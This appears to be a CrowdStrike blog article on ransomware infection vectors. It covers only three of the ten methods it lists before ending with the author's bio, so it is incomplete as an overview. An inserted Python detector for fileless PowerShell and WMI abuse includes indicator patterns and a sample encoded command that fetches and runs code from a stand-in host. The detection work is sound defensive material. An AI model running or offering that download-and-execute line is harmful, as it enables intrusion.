Ransomware Infection Methods

As ransomware operators continue to evolve their tactics, it’s important to understand the most common attack vectors used so that you can effectively defend your organization.

Ransomware spreads in several different ways, but the 10 most common infection methods include:

  1. Social Engineering (Phishing)
  2. Malvertising
  3. Fileless Attacks
  4. Remote Desktop Protocol
  5. MSPs and RMMs
  6. Drive-By Downloads
  7. Pirated Software
  8. Network Propagation
  9. Malware Obfuscation
  10. Ransomware-as-a-Service

1. Phishing Emails Using Social Engineering

Technology and human nature are two sides of the same coin when it comes to ransomware attacks. In one case observed by CrowdStrike, an attacker spoofed a CEO’s email address and used social engineering to trick employees into clicking a link in a fake message that appeared to come from the executive.

To succeed, this attack required methodical research into the company’s management, its employees and the industry. As big game hunting (BGH) attacks increase, social engineering is becoming a more intensive presence in phishing attacks. Social media also plays a huge role, not only enabling attackers to discover information on potential victims but also serving as a conduit for deploying malware.

2. Malvertising and Exploit Kits

Malvertising and exploit kits are often used together to propagate ransomware. Attackers create “Trojan pop-ups” or advertisements containing hidden malicious code; when a user clicks on one of them, they are surreptitiously redirected to the exploit kit’s landing page, where a component of the kit discreetly scans the machine for vulnerabilities that the attacker can then exploit.

If the exploit kit is successful, it delivers a ransomware payload to infect the host. Exploit kits are popular with eCrime organizations because of their automated nature. In addition, exploits are an efficient fileless technique: they can be injected directly into memory without writing anything to disk, which makes them undetectable by traditional antivirus software.

Exploit kits are also proliferating among less sophisticated ransomware attackers, because they do not require a great deal of technical know-how to deploy. With a modest investment on the darknet, virtually anyone can get into the online ransom business.

3. Fileless Attacks

Fileless ransomware techniques are increasing. These are attacks in which the initial tactic does not result in an executable file being written to disk. Fileless ransomware uses pre-installed operating system tools, such as PowerShell or WMI, so that the attacker can perform tasks without a malicious file ever having to be run on the compromised system. This technique is popular because fileless attacks are able to bypass most legacy AV solutions.
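As an added, defender-side illustration (not code from this article or from CrowdStrike), the following Python scores process-creation records for the fileless pattern described above: PowerShell launched with a hidden window and an encoded command, or spawned through WMI, with nothing dropped to disk. The record format, the indicator patterns and the sample records are assumptions constructed for this example.

```python
import base64
import re

# Indicator patterns for PowerShell/WMI use that avoids dropping a file to disk
# (assumed for this example; not a CrowdStrike detection rule).
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "no_profile": re.compile(r"-nop(?:rofile)?\b", re.I),
    "in_memory_exec": re.compile(r"\biex\b|invoke-expression", re.I),
    "remote_download": re.compile(r"downloadstring|downloadfile|invoke-webrequest", re.I),
    "wmi_spawn": re.compile(r"wmic\s+process\s+call\s+create|win32_process", re.I),
}
# -e, -ec, -en, -enc, -encoded or -encodedcommand followed by a base64 blob
ENCODED = re.compile(r"-e(?:c|n|nc|ncoded|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)

def decode_encoded_command(cmd):
    """Return the plaintext of a -EncodedCommand argument (base64 of UTF-16LE), or None."""
    m = ENCODED.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyze(event):
    """Return the indicator names that fire on one process-creation record."""
    decoded = decode_encoded_command(event["cmd"])
    text = event["cmd"] + " " + (decoded or "")  # scan raw and decoded text together
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    if decoded is not None:
        hits.append("encoded_command")
    return {"host": event["host"], "decoded": decoded, "indicators": hits}

def triage(events, threshold=2):
    """Keep records on which at least `threshold` indicators fired."""
    return [r for r in map(analyze, events) if len(r["indicators"]) >= threshold]

def encode_ps(script):
    """Encode a script the way -EncodedCommand expects (used only to build the sample)."""
    return base64.b64encode(script.encode("utf-16-le")).decode()

# Constructed sample records in the shape an EDR or Sysmon Event ID 1 would log.
SAMPLE_EVENTS = [
    {"host": "ws01", "cmd": "powershell.exe -NoP -W Hidden -Enc "
     + encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage')")},
    {"host": "ws02", "cmd": "powershell.exe -ExecutionPolicy RemoteSigned -File C:\\scripts\\backup.ps1"},
    {"host": "ws03", "cmd": 'wmic process call create "powershell -nop -w hidden -c Get-Date"'},
]
```

Calling `triage(SAMPLE_EVENTS)` returns the ws01 and ws03 records with their fired indicators and, for ws01, the decoded command; the legitimate signed-script launch on ws02 is left alone.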

Kurt Baker is the senior director of product marketing for Falcon Intelligence at CrowdStrike. He has over 25 years of experience in senior leadership positions, specializing in emerging software companies. He has expertise in cyber threat intelligence, security analytics, security management and advanced threat protection. Prior to joining CrowdStrike, Baker worked in technical roles at Tripwire and had co-founded startups in markets ranging from enterprise security solutions to mobile devices. He holds a bachelor of arts degree from the University of Washington and is now based in Boston, Massachusetts.